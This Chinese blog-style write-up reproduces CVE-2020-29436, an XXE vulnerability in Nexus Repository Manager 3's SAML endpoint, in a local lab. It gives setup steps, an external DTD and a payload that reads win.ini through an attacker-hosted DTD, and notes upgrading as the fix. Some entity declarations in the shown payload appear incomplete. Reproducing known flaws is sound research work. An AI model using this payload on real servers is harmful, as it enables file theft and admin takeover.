CVE-2020-29436:Nexus3 XML外部实体注入复现
CVE-2020-29436:Nexus3 XML外部实体注入复现
0x01 简介
Nexus Repository Manager 3是一款通用的软件包仓库管理(Universal Repository Manager)服务。
0x02 漏洞概述
编号:CVE-2020-29436
/service/rest/internal/ui/saml接口允许加载外部dtd。攻击者能够利用该漏洞获取Nexus Repository Manager 3的管理员帐户,从而可以配置系统、查看文件系统上的文件,获取敏感信息。
0x03 影响版本
Nexus Repository Manager 3 <= 3.28.1
0x04 环境搭建
本地环境需要JDK 1.8以上
官网下载:
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3
本次复现使用版本为3.28.1
解压后,到nexus-3.28.1-01\bin目录下
命令行运行:nexus.exe /run
稍等一会,出现下图,表示启动成功
访问管理后台:http://localhost:8081/
点击登录,输入默认口令:admin/admin123
登陆失败,百度一下:
cd /sonatype-work/nexus3找到admin.password,密码就是那一串字符:
哦~,原来是不让使用默认密码,也访问不了saml接口,只有pro版本才可以
然后去下载pro版本的证书(此处一定要用火狐浏览器,Google快把我整废)
https://www.sonatype.com/nexus/repository-pro/trial
下载好证书文件
安装证书
证书安装成功后如下图所示
接着服务器重启服务,可以看到版本已经变成了pro
0x05 漏洞复现
访问:
http://yourhost:8081/#admin/security/saml
在填入payload之前先用python起一个http服务
并在http服务的目录下写一个my.dtd文件,文件内容为:
<!ENTITY % all
"<!ENTITY % send SYSTEM '%file;'>"
>
%all;
接着将payload填入到文本框中
<!DOCTYPE ANY [
% file SYSTEM "file:///C:/Windows/win.ini">
% dtd SYSTEM "http://127.0.0.1:8000/my.dtd">
%dtd;
%send;
]>
<ANY>xxe</ANY>拦截数据包再次发送
得到ini文件内容,dtd文件被加载
0x06 修复方式
及时升级到最新版本。
0x07 总结
在即将跪下的前一刻,站起来。
参考链接:https://paper.seebug.org/1431/
https://blog.csdn.net/cuncaojin/article/details/81270897
https://www.jianshu.com/p/fcb128e34c87